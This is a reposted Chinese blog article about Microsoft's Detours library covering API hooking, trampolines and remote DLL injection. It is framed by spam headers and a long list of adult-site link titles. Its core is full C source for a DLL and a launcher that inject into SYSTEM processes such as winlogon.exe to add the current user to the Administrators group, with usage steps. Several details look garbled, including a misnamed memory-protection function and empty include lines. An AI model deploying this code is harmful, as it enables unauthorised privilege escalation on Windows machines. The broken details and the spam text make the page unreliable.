青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

旅途

如果想飛得高,就該把地平線忘掉

用DETOURS庫獲取NT管理員權限

---- Detours是微軟開發的一個函數庫(源代碼可在http://research.microsoft.com/sn/detours 免費獲得), 用于修改運行中的程序在內存中的影像,從而即使沒有源代碼也能改變程序的行為。具體用途是:

攔截WIN32 API調用,將其引導到自己的子程序,從而實現WIN32 API的定制。
為一個已在運行的進程創建一新線程,裝入自己的代碼并運行。
---- 本文將簡介Detours的原理,Detours庫函數的用法, 并利用Detours庫函數在Windows NT上編寫了一個程序,該程序能使有“調試程序”的用戶權限的用戶成為系統管理員,附錄利用Detours庫函數修改該程序使普通用戶即可成為系統管理 員.


一. Detours的原理

---- 1. WIN32進程的內存管理

---- 總所周知,WINDOWS NT實現了虛擬存儲器,每一WIN32進程擁有4GB的虛存空間, 關于WIN32進程的虛存結構及其操作的具體細節請參閱WIN32 API手冊, 以下僅指出與Detours相關的幾點:

---- (1) 進程要執行的指令也放在虛存空間中
---- (2) 可以使用QueryProtectEx函數把存放指令的頁面的權限更改為可讀可寫可執行,再改寫其內容,從而修改正在運行的程序
---- (3) 可以使用VirtualAllocEx從一個進程為另一正運行的進程分配虛存,再使用 QueryProtectEx函數把頁面的權限更改為可讀可寫可執行,并把要執行的指令以二進制機器碼的形式寫入,從而為一個正在運行的進程注入任意的代碼

---- 2. 攔截WIN32 API的原理

---- Detours定義了三個概念:

---- (1) Target函數:要攔截的函數,通常為Windows的API。
---- (2) Trampoline函數:Target函數的復制品。因為Detours將會改寫Target函數,所以先把Target函數復制保存好,一方面仍然保存Target函數的過程調用語義,另一方面便于以后的恢復。
---- (3) Detour 函數:用來替代Target函數的函數。

---- Detours在Target函數的開頭加入JMP Address_of_ Detour_ Function指令(共5個字節)把對Target函數的調用引導到自己的Detour函數, 把Target函數的開頭的5個字節加上JMP Address_of_ Target _ Function+5作為Trampoline函數。例子如下:

攔截前:Target _ Function:
 ;Target函數入口,以下為假想的常見的子程序入口代碼
 push  ebp
 mov  ebp,  esp
 push  eax
 push  ebx
 Trampoline:
 ;以下是Target函數的繼續部分
 ……

攔截后: Target _ Function:
 jmp  Detour_Function
 Trampoline:
 ;以下是Target函數的繼續部分
 ……

 Trampoline_Function:
 ; Trampoline函數入口, 開頭的5個字節與Target函數相同
 push  ebp
 mov  ebp,  esp
 push  eax
 push  ebx
 ;跳回去繼續執行Target函數
 jmp  Target_Function+5
---- 3. 為一個已在運行的進程裝入一個DLL

---- 以下是其步驟:

---- (1) 創建一個ThreadFuction,內容僅是調用LoadLibrary。
---- (2) 用VirtualAllocEx為一個已在運行的進程分配一片虛存,并把權限更改為可讀可寫可執行。
---- (3) 把ThreadFuction的二進制機器碼寫入這片虛存。
---- (4) 用CreateRemoteThread在該進程上創建一個線程,傳入前面分配的虛存的起始地址作為線程函數的地址,即可為一個已在運行的進程裝入一個DLL。通過DllMain 即可在一個已在運行的進程中運行自己的代碼。

二. Detours庫函數的用法

---- 因為Detours軟件包并沒有附帶幫助文件,以下接口僅從剖析源代碼得出。

---- 1. PBYTE WINAPI DetourFindFunction(PCHAR pszModule, PCHAR pszFunction)

---- 功能:從一DLL中找出一函數的入口地址
---- 參數:pszModule是DLL名,pszFunction是函數名。
---- 返回:名為pszModule的DLL的名為pszFunction的函數的入口地址
---- 說明:DetourFindFunction除使用GetProcAddress外,還直接分析DLL的文件頭,因此可以找到一些GetProcAddress找不到的函數入口。

---- 2. DETOUR_TRAMPOLINE(trampoline_prototype, target_name)
---- 功能:該宏把名為target_name 的Target函數生成Trampoline函數,以后調用 trampoline_prototype在語義上等于調用Target函數。

---- 3. BOOL WINAPI DetourFunctionWithTrampoline(PBYTE pbTrampoline, BYTE pbDetour)
---- 功能:用Detour 函數攔截Target函數
---- 參數:pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype,pbDetour是 Detour 函數的入口地址。

---- 4. BOOL WINAPI DetourRemoveWithTrampoline(PBYTE pbTrampoline,PBYTE pbDetour)
---- 功能:恢復Target函數
---- 參數:pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype,pbDetour是 Detour 函數的入口地址。

---- 5. BOOL WINAPI ContinueProcessWithDll(HANDLE hProcess, LPCSTR lpDllName)
---- 功能:為一個已在運行的進程裝入一個DLL
---- 參數:hProcess是進程的句柄,lpDllName是要裝入的DLL名

三. 程序實例

---- 以一個能使有“調試程序”的用戶權限的用戶成為系統管理員的程序做例子說明Detours 庫函數的用法。程序的設計思路是找一個以System帳號運行的進程,如spoolss.exe, rpcss.exe, winlogon.exe, service.exe等,使用ContinueProcessWithDll在其中注入把當前用戶加入到 Administrators本地組的DLL,因為該DLL在這些進程的安全上下文環境運行,所以有相應的權限。

---- 先編寫相應的DLL:

/*admin.dll, 當進程裝入時會把名為szAccountName
 的用戶加入到Administrators本地組。*/

#include
#include
#include
#include

/*以下創建一共享段實現進程間的數據通訊,
 szAccountName 是用戶名,bPrepared說明
 szAccountName是否已初始化。*/

#pragma data_seg(".MYSHARE")
BOOL bPrepared=FALSE;
wchar_t szAccountName[100]={0};
#pragma data_seg()

#pragma comment(linker, "/SECTION:.MYSHARE,RWS")

/*程序調用SetAccountName設置要加入到Administrators
 本地組的用戶名,并通知DllMain
 已初始化szAccountName ,
 以后被裝入時可調用ElevatePriv */

__declspec(dllexport) VOID WINAPI
 SetAccountName(wchar_t *Name)
{
wcscpy(szAccountName,Name);
bPrepared=TRUE;
}

/*把名為szAccountName的用戶加入
 到Administrators本地組*/

__declspec(dllexport) VOID WINAPI ElevatePriv()
{
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname=szAccountName;
NetLocalGroupAddMembers(NULL,L"Administrators",
3,(LPBYTE)&account,1);
}

__declspec(dllexport) ULONG WINAPI
DllMain(HINSTANCE hInstance,
DWORD dwReason, PVOID lpReserved)
{
switch (dwReason) {
 case DLL_THREAD_ATTACH:
 if (bPrepared)
   ElevatePriv();
}
return TRUE;
}

程序如下:

/*AddMeToAdministrators.exe 把當前用戶加入到
 Administrators本地組。使用方法為:(1)
---- 運行任務管理器找到spoolss.exe或rpcss.exe或winlogon.exe或sevice.exe的進程ID (2)執行AddMeToAdministrators.exe procid, 其中procid為(1)記下的進程ID (3)簽退再簽到,運行用戶管理器,即可發現自己已在Administrators本地組中。*/

#include
#include
#include
#include
#include

extern VOID WINAPI SetAccountName(wchar_t *Name);

/* GetCurrentUser得到自己的用戶名稱*/

void GetCurrentUser(wchar_t *szName)
{
 HANDLE hProcess, hAccessToken;
 wchar_t InfoBuffer[1000],szAccountName[200],
 szDomainName[200];
 PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
 DWORD dwInfoBufferSize,dwAccountSize = 200,
 dwDomainSize = 200;
 SID_NAME_USE snu;

 hProcess = GetCurrentProcess();

 OpenProcessToken(hProcess,TOKEN_READ,&hAccessToken);

 GetTokenInformation(hAccessToken,TokenUser,
 InfoBuffer,
     1000, &dwInfoBufferSize);

 LookupAccountSid(NULL, pTokenUser->User.Sid,
 szAccountName,
     &dwAccountSize,szDomainName, &dwDomainSize, &snu);
 wcscpy(szName,szDomainName);
 wcscat(szName,L"\\");
 wcscat(szName,szAccountName);
}

/* EnablePrivilege啟用自己的“調試程序”的用戶權限*/

BOOL EnablePrivilege(LPCTSTR szPrivName,BOOL fEnable)
{
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(),
           TOKEN_ADJUST_PRIVILEGES, &hToken))
 return FALSE;
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, szPrivName,
&tp.Privileges[0].Luid);
tp.Privileges[0].Attributes = fEnable ?
SE_PRIVILEGE_ENABLED : 0;
AdjustTokenPrivileges(hToken, FALSE, &tp,
sizeof(tp), NULL, NULL);
return((GetLastError() == ERROR_SUCCESS));
}

int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hprev,
LPSTR lpszCmdLine, int
nCmdShow)
{
INT argc;
WCHAR **argv;
argv = CommandLineToArgvW(GetCommandLineW(),
&argc);
INT nProcessId = -1;
if (argc!=2){
 wprintf(L"usage %s pid", argv[0]);
 return 1;
}
nProcessId = _wtoi(argv[1]);
printf("%d\n",nProcessId);
---- /*要成功執行ContinueProcessWithDll,要對winlogon.exe等進程的進程句柄有讀寫存儲器內容和創建線程的權限,EnablePrivilege使本進程有這樣的權利。*/

if (!EnablePrivilege(SE_DEBUG_NAME, TRUE)){
 printf("AdjustTokenPrivilege Fail %u\n",
(UINT)GetLastError());
 return 1;
}
HANDLE  gNewHandle =
OpenProcess(PROCESS_ALL_ACCESS
, TRUE, nProcessId);
if (!gNewHandle){
 printf("OpenProcess Fail %u\n",
(UINT)GetLastError());
 return 1;
}
 wchar_t szName[100];
GetCurrentUser(szName);
SetAccountName(szName);
If (!ContinueProcessWithDll(gNewHandle,
L"c:\\temp\\admin.dll")) {
 printf("ContinueProcessWithDll failed %u",
(UINT)GetLastError());
 return 3;
}
return 0;
}
---- 因為“調試程序”的用戶權限缺省情況下僅賦予給管理員,因此并不會造成安全漏洞。但該程序揭示出“調試程序”的用戶權限其實是至高無上的用戶權限,只能授予給可信用戶。

四. 結論 ---- Detours是一強大的工具,提供了簡單易用的函數接口來攔截WIN32 API調用和為一個已在運行的進程裝入一個DLL。  
 

Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=1628087


posted on 2007-07-29 13:10 旅途 閱讀(554) 評論(0)  編輯 收藏 引用 所屬分類: 深入windows

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            亚洲区第一页| 欧美日韩视频一区二区| 国产精品入口66mio| 最新国产成人在线观看| 久久亚洲午夜电影| 久久免费高清| 欧美成在线观看| 亚洲精品国产精品国产自| 亚洲精品美女在线观看| 中文精品视频一区二区在线观看| 亚洲一区成人| 久久综合久久久久88| 欧美国产日韩一区二区三区| 国产精品扒开腿做爽爽爽视频| 国产日韩在线不卡| 91久久久久久久久| 欧美伊人久久久久久午夜久久久久 | 亚洲国产毛片完整版| 亚洲久色影视| 欧美尤物巨大精品爽| 免费观看日韩| 中文av一区二区| 久久视频在线看| 国产精品久久久久久久久久久久久久| 国产一区欧美| 亚洲一区二区三区免费在线观看| 久久最新视频| 亚洲一区二区三区四区视频| 欧美成人精品影院| 国产在线播精品第三| 日韩一二三区视频| 卡通动漫国产精品| 亚洲图片在线观看| 免费人成网站在线观看欧美高清| 欧美午夜精品久久久久免费视 | 一区二区三区在线视频免费观看| 一区二区三区四区精品| 欧美96在线丨欧| 性色av一区二区三区在线观看| 欧美精品日韩综合在线| 在线观看视频欧美| 久久精品理论片| 亚洲午夜精品一区二区| 欧美激情一区在线| 91久久国产精品91久久性色| 久久免费视频在线| 欧美伊人影院| 国产精品综合色区在线观看| 中文国产成人精品久久一| 亚洲大胆人体在线| 麻豆成人综合网| 99国产欧美久久久精品| 先锋影音久久久| 欧美日韩小视频| 亚洲伦理一区| 亚洲日本va午夜在线电影| 蘑菇福利视频一区播放| 亚洲第一精品影视| 欧美国产日韩一区二区在线观看 | 国产精品羞羞答答xxdd| 国产精品99久久久久久www| 亚洲日本一区二区| 欧美日韩国产精品专区| 99视频一区二区三区| 最新日韩精品| 欧美日韩国产探花| 亚洲欧美精品在线| 亚洲欧美日韩精品久久亚洲区| 欧美视频官网| 午夜精品视频一区| 欧美一区二区三区免费在线看| 国产日韩欧美亚洲| 久久久噜噜噜久久狠狠50岁| 久久激情五月婷婷| 亚洲国产成人av好男人在线观看| 欧美福利视频网站| 欧美日韩精品伦理作品在线免费观看 | 亚洲国产欧美一区| 亚洲青涩在线| 国产精品初高中精品久久| 亚洲欧美综合精品久久成人| 亚洲欧美日韩精品| 亚洲国产成人精品女人久久久| 亚洲国产精品久久久久秋霞蜜臀| 欧美日韩卡一卡二| 欧美一区二区三区免费视频| 欧美在线你懂的| 亚洲久久一区二区| 亚洲制服少妇| 1024亚洲| 亚洲一本视频| 亚洲黄一区二区| 亚洲一二三级电影| 在线欧美小视频| 一本一本a久久| 精品动漫一区| 亚洲性视频网址| 亚洲日韩中文字幕在线播放| 亚洲永久字幕| 亚洲免费观看高清完整版在线观看熊| 亚洲永久精品国产| 亚洲欧洲日韩综合二区| 亚洲自拍偷拍色片视频| 亚洲国产综合91精品麻豆| 亚洲一区三区电影在线观看| 亚洲高清久久久| 欧美一级黄色录像| 狼狼综合久久久久综合网| 欧美大色视频| 久久精品亚洲| 欧美日韩综合在线免费观看| 老司机精品视频网站| 欧美性猛交99久久久久99按摩| 噜噜噜躁狠狠躁狠狠精品视频| 国产精品va在线播放| 91久久久久久| 亚洲第一精品夜夜躁人人躁| 午夜性色一区二区三区免费视频| 亚洲精品一区二区三区在线观看| 欧美在线你懂的| 性欧美暴力猛交另类hd| 欧美日韩另类国产亚洲欧美一级| 免费在线看成人av| 国语精品一区| 欧美一级黄色录像| 午夜精品福利在线| 欧美先锋影音| 在线一区观看| 亚洲一区二区免费视频| 欧美精品二区| 亚洲精品国产精品国自产观看浪潮| 在线观看亚洲精品| 久久青青草综合| 久久久伊人欧美| 国产一区二区三区高清| 羞羞答答国产精品www一本| 香蕉尹人综合在线观看| 国产精品免费区二区三区观看| 亚洲素人一区二区| 午夜精品久久久久久久| 国产欧美日韩在线视频| 午夜精品美女久久久久av福利| 亚洲欧美视频在线| 国产精品三上| 欧美一级播放| 老司机午夜精品视频在线观看| 永久免费毛片在线播放不卡| 老司机免费视频一区二区三区| 久久亚洲美女| 91久久精品美女高潮| 欧美日韩xxxxx| 亚洲午夜久久久久久久久电影院| 欧美亚洲系列| 在线不卡视频| 欧美国产一区二区在线观看| 99re6热只有精品免费观看 | 亚洲免费视频在线观看| 国产精品美女主播| 亚洲欧美日韩一区二区在线| 久久综合伊人77777蜜臀| 亚洲欧洲一区二区天堂久久| 欧美日韩精品三区| 性久久久久久| 亚洲国产精品久久久| 亚洲免费影院| 在线观看视频一区二区| 欧美日韩另类视频| 午夜精品久久久久久久男人的天堂 | 欧美亚州一区二区三区| 久久成人综合网| 在线免费观看日韩欧美| 欧美—级在线免费片| 亚洲一区二区三区高清| 蜜月aⅴ免费一区二区三区 | 久久久精品午夜少妇| 亚洲级视频在线观看免费1级| 欧美视频中文字幕| 久久久久久9| 夜夜精品视频一区二区| 久久一区国产| 亚洲小少妇裸体bbw| 136国产福利精品导航网址应用 | 亚洲人成久久| 国产麻豆日韩欧美久久| 欧美久久视频| 久久大综合网| 一本色道久久综合狠狠躁篇的优点| 另类亚洲自拍| 久久国产精品72免费观看| 日韩亚洲视频在线| 在线欧美不卡| 国产一区二区三区日韩欧美| 国产精品爱啪在线线免费观看| 女人色偷偷aa久久天堂| 久久精品一区二区三区不卡| 午夜精品影院在线观看| 亚洲图片欧美日产| av不卡在线| 日韩一级黄色大片| 91久久在线观看|